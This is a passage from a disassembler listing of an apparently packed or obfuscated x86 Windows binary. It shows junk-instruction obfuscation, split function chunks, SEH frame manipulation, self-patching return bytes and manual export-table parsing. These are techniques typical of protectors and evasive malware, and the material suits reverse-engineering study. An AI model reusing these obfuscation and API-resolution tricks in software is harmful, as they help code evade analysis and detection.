		jb	loc_43D75F

loc_444F39:				; CODE XREF: y2kk37jd:0044A539j
		jmp	loc_456839
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449F5B

loc_444F3E:				; CODE XREF: sub_449F5B-B748j
		jmp	loc_45983E
; END OF FUNCTION CHUNK	FOR sub_449F5B
; ---------------------------------------------------------------------------
		xchg	esi, eax
		jmp	loc_4407F6
; ---------------------------------------------------------------------------

loc_444F4A:				; DATA XREF: sub_452665-6AFEo
		xor	eax, eax
; START	OF FUNCTION CHUNK FOR sub_44921F

loc_444F4C:				; CODE XREF: sub_44921F+5j
		pop	large dword ptr	fs:0
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_44921F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_444F57:				; CODE XREF: sub_44DB77+15j
		jmp	loc_444F12
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_444F5C:				; CODE XREF: sub_45689F:loc_443451j
		jmp	loc_454098
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_444F61	proc near		; CODE XREF: sub_452665p

; FUNCTION CHUNK AT 00443064 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045023C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004584A8 SIZE 0000000C BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		jmp	loc_45023C
sub_444F61	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_444F74:				; CODE XREF: sub_453583:loc_441764j
		mov	eax, [esp+0]
		push	esi
		push	edx
		pop	esi
		xchg	esi, [esp+4+var_4]
		push	edi
		push	5E7499B8h
		jmp	loc_443310
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------

loc_444F88:				; CODE XREF: y2kk37jd:004456B0j
		jl	loc_440053
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_444F8E:				; CODE XREF: sub_45689F-F9B5j
		jmp	loc_446EF5
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		test	esi, 0E1DB3143h
		jmp	loc_44CA4E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_286. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A36

loc_444F9F:				; CODE XREF: sub_458A36+Fj
		jmp	loc_441330
; END OF FUNCTION CHUNK	FOR sub_458A36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_444FA4:				; CODE XREF: sub_4480CB-6491j
					; sub_4480CB:loc_44C6C6j ...
		jno	loc_451BE0
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_440AE8

loc_444FB9:				; CODE XREF: sub_43F911:loc_44E6AEj
		mov	ecx, [ebx+ecx+0Ch]
		or	ecx, ecx
		jmp	loc_451327
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9FA

loc_444FC4:				; CODE XREF: sub_43B9FA+4j
		mov	eax, [eax+0Ch]
		push	offset loc_446A0F
		jmp	loc_448E5E
; END OF FUNCTION CHUNK	FOR sub_43B9FA

; =============== S U B	R O U T	I N E =======================================



sub_444FD1	proc near		; DATA XREF: y2kk37jd:loc_444993o

; FUNCTION CHUNK AT 00458F01 SIZE 00000005 BYTES

		add	edx, 2EB2B933h
		xchg	edx, [esp+0]
		jmp	loc_458F01
sub_444FD1	endp

; ---------------------------------------------------------------------------
		push	0E917772Dh
		shl	ecx, 3
		jmp	sub_4425EC
; ---------------------------------------------------------------------------

loc_444FEC:				; CODE XREF: y2kk37jd:0045796Fj
		test	eax, 92B53BF0h
		jmp	loc_44768D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_444FF7:				; CODE XREF: sub_448700+92j
		jb	loc_43E23C

loc_444FFD:				; CODE XREF: sub_44AC77:loc_448E96j
		push	0FC3933B9h
		pop	eax
		add	eax, 8706DD6h
		xor	eax, 0BE901686h
		call	sub_448770

loc_445014:				; CODE XREF: y2kk37jd:00447ECEj
		jmp	loc_45AB49
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_445019:				; CODE XREF: sub_43F75D-125Fj
		jmp	loc_45066F
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------

loc_44501E:				; CODE XREF: y2kk37jd:00458D62j
		shr	esi, 3
		mov	ecx, 0E4474BB7h
		add	edx, edi
		test	ebp, edx
		jmp	loc_44EC74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44502F:				; CODE XREF: sub_43BD0D:loc_43D877j
		mov	byte ptr [eax],	0C3h
		jmp	loc_4519EE
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_445037:				; CODE XREF: y2kk37jd:0045C0D2j
		mov	eax, [esp]
		push	eax
		push	edx
		pop	eax
		xchg	eax, [esp]
		call	sub_4513DB
		push	offset loc_442600
		jmp	locret_44127F
; ---------------------------------------------------------------------------

loc_44504F:				; CODE XREF: y2kk37jd:loc_457A5Fj
		jz	loc_440AFB
		jmp	loc_45A217
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_44505A:				; CODE XREF: sub_44FB21+9EDEj
		rol	ecx, 1
		sbb	eax, 84DF395h
		jb	loc_4488EA
; END OF FUNCTION CHUNK	FOR sub_44FB21
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_445068:				; CODE XREF: sub_443BAF:loc_44E6CEj
		push	edx
		push	16A4D9Eh
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		jmp	loc_4450EF
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_445079:				; CODE XREF: sub_4564EB:loc_44A50Dj
					; sub_4564EB:loc_45B04Cj
		jmp	nullsub_448
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
		jmp	loc_458921

; =============== S U B	R O U T	I N E =======================================



sub_445083	proc near		; CODE XREF: sub_447E2D+3j

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043C3AF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EEFA SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00443CD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443FA1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449E0C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459B5F SIZE 00000005 BYTES

		add	esp, 0FFFFFFF0h
		push	edx
		mov	edx, eax
		xchg	edx, [esp+14h+var_14]
		jmp	loc_43EEFA
sub_445083	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_445091:				; CODE XREF: sub_4408B9+11E41j
		mov	eax, edx
		call	sub_445BB5
		mov	eax, [esp-4+arg_0]
		jmp	loc_44F7C7
; ---------------------------------------------------------------------------

loc_4450A0:				; CODE XREF: sub_4408B9+D6D4j
		ror	eax, 1Fh
		jmp	loc_445826
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE9F

loc_4450A8:				; CODE XREF: sub_44DE9F-6F2Cj
		jnz	loc_440727
		xchg	ecx, [esi]
		sbb	ebx, edi
		sbb	edi, esi
		shr	edi, 1Ch
		jmp	loc_440727
; END OF FUNCTION CHUNK	FOR sub_44DE9F
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_43DBC4
		jmp	loc_44BA2D
; ---------------------------------------------------------------------------

loc_4450C9:				; CODE XREF: y2kk37jd:loc_440DF3j
		mov	byte ptr [eax],	0C3h
		jmp	sub_43CF31

; =============== S U B	R O U T	I N E =======================================



sub_4450D1	proc near		; CODE XREF: sub_41A889+41p
					; sub_41A889+44p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C27F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00444CFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004477D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E042 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450541 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00450A68 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004515C3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00457AD1 SIZE 00000017 BYTES

		push	ebx
		push	10B40507h
		pop	ebx
		add	ebx, 0B347659h
		or	ebx, 19A7E6DDh
		add	ebx, 0E4550A56h
		jmp	loc_44E042
sub_4450D1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_4450EF:				; CODE XREF: sub_443BAF+14C5j
		add	edx, 45AD8C20h
		rol	edx, 17h
		cmp	edx, 0D44845C0h
		jmp	loc_457B48
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------

loc_445103:				; CODE XREF: y2kk37jd:004464CFj
		jz	loc_446AEC
		jmp	loc_44CF49
; ---------------------------------------------------------------------------

loc_44510E:				; DATA XREF: sub_44DBF8:loc_440A1Ao
		xchg	ecx, [esp]
		jmp	loc_457C53

; =============== S U B	R O U T	I N E =======================================



sub_445116	proc near		; CODE XREF: y2kk37jd:0043E451j
					; sub_445226+63p
		xchg	edi, [esp+0]
		pop	edi
		ror	eax, 16h
		mov	ds:dword_4516DC, eax
		retn
sub_445116	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_445124:				; CODE XREF: sub_442938+882Bj
		jmp	loc_45A905
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451682

loc_445129:				; CODE XREF: sub_451682-1028Bj
		jmp	nullsub_385
; END OF FUNCTION CHUNK	FOR sub_451682
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_44512E:				; CODE XREF: sub_45A961-15057j
		jz	loc_4443B0
		jmp	loc_4564AD
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_445139:				; CODE XREF: sub_440EC8:loc_43C8D6j
		pop	esi
		rol	esi, 19h
		xor	esi, 88BCFC2Dh
		add	esi, ebp
		add	esi, 0DF3CD42h
		jmp	loc_44B72C
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_445150:				; CODE XREF: sub_43BF5F+1FAE0j
		inc	dword ptr [ebp-28h]

loc_445153:				; CODE XREF: y2kk37jd:00452731j
		push	4716BBA9h
		pop	eax
		or	eax, 4B002E46h
		xor	eax, 0F20EE586h
		push	offset sub_458520
		jmp	loc_450BC2
; END OF FUNCTION CHUNK	FOR sub_43BF5F

; =============== S U B	R O U T	I N E =======================================



sub_44516F	proc near		; CODE XREF: y2kk37jd:0044D824j
					; sub_443AFD+D192p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FAEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044148D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441635 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443090 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004457F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD91 SIZE 00000016 BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		xchg	ebp, [esp+0]
		call	sub_4553C1
		mov	eax, 462C961Fh
		jmp	loc_44DD91
sub_44516F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_445185	proc near		; DATA XREF: sub_4406A2+6o
		lea	eax, sub_4477F9
		mov	byte ptr [eax],	0C3h
		jmp	sub_4477F9
sub_445185	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477F9

loc_445193:				; CODE XREF: sub_4477F9+1j
		mov	eax, [esp+0]
		push	offset sub_44BBEA
		jmp	nullsub_49
; END OF FUNCTION CHUNK	FOR sub_4477F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_4451A0:				; CODE XREF: sub_457D5A-706Ej
		jnz	loc_456230

loc_4451A6:				; CODE XREF: sub_457D5A:loc_44D76Ej
		push	offset loc_44C83B
		jmp	nullsub_227
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453778

loc_4451B0:				; CODE XREF: sub_453778:loc_445865j
		xor	edi, 9A2453CDh
		and	edi, 0F1026CBEh
		add	edi, 750C7838h
		add	edx, edi
		pop	edi
		jmp	loc_453CE3
; END OF FUNCTION CHUNK	FOR sub_453778
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4451CA:				; CODE XREF: sub_454413:loc_44E116j
		jg	loc_45308B
		jmp	loc_453C2F
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------

loc_4451D5:				; DATA XREF: sub_453315+14A2o
		pop	ebp
		push	9107D4FBh
		pop	eax
		xor	eax, 70E7D78Ch
		or	eax, 0FF722B8Fh
		call	sub_457B90
; START	OF FUNCTION CHUNK FOR sub_447659

loc_4451ED:				; CODE XREF: sub_447659+AF6Dj
		jmp	loc_4572CE
; END OF FUNCTION CHUNK	FOR sub_447659
; ---------------------------------------------------------------------------

loc_4451F2:				; CODE XREF: y2kk37jd:loc_44FBEBj
		jz	loc_453CAC

loc_4451F8:				; CODE XREF: y2kk37jd:0045B9A1j
		jmp	loc_43E760
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E14

loc_4451FD:				; CODE XREF: sub_441E14+14j
					; sub_451634:loc_442D6Fj
		jmp	nullsub_277
; END OF FUNCTION CHUNK	FOR sub_441E14
; ---------------------------------------------------------------------------
		rol	esi, 1
		cmp	ebx, 71539490h
		jmp	loc_453CA6
; ---------------------------------------------------------------------------

loc_44520F:				; CODE XREF: y2kk37jd:00446574j
		jnz	locret_446182
		test	edx, 0BB29E8B8h
		jmp	loc_4524D5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_311. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_445221:				; CODE XREF: y2kk37jd:00440DB6j
		jmp	loc_43B924

; =============== S U B	R O U T	I N E =======================================



sub_445226	proc near		; CODE XREF: sub_44594E+8p
					; y2kk37jd:00452509j

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043B6B1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043B9E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BA03 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043BD08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BED1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C060 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C0DE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043C239 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C367 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043C515 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043C547 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C831 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043C9B3 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043CC56 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043CCC6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043CDD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CF50 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043CFBC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D149 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D44F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D7BB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D911 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DCAC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043E009 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E11A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E158 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E30B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E468 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043E525 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E915 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E97A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043F1B1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F49E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F599 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F831 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0043F96B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F9B3 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043F9E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F9F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FB18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044009E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004400D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440301 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004403D1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440502 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004406B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409D8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440FB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411FC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441586 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004416DD SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00441A08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B15 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441C54 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00441FED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442133 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004424C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442510 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442D8D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443014 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004432C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044333A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044360B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044381A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004438AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004438E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443CEA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443DF3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443F09 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444031 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444156 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00444289 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004443F9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444593 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00444C1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444DAD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444E57 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00444E69 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004455CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445666 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445680 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004456B5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004459B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445BF6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445C98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445D2B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446334 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446397 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044661C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BB5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446CFB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446D6F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446F50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004476B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004476D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004478E7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00448105 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044812E SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00448262 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004483B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044890D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004489F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448AE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448CF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D6A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00448E3B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448E9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044936E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044961F SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004496DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449C60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449CF8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449D20 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449D9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A1FB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A3DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A695 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AC57 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044AD96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B013 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B241 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B5E9 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044B6B9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044BFCF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C155 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C48C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C96C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA9E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044CB23 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044CB5D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044CED1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D194 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D326 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D4DA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D50E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D55C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D57C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D66C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D8BF SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0044D906 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D977 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044DAEC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044DC8F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DDE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE39 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044E2EF SIZE 00000037 BYTES
; FUNCTION CHUNK AT 0044E668 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E746 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E7E0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E7F8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EA3A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ED54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EFBA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EFF6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044F183 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044F536 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F6BF SIZE 00000039 BYTES
; FUNCTION CHUNK AT 0044F728 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F873 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8B2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F9E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA10 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044FA32 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FB9C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FC04 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044FC3B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004500E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004503B5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004503F2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00450702 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450EE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451011 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451911 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451924 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00451CAE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451E90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452000 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045207F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004522ED SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452413 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452593 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004527EF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452B5F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452D1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452EC7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453400 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 00453432 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004538BE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453AD1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453EE8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453F43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045412A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00454687 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004546C9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004548B6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004549B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454A3E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454D56 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F92 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00455373 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455469 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455551 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455627 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455772 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455953 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455CA5 SIZE 00000006 BYTES
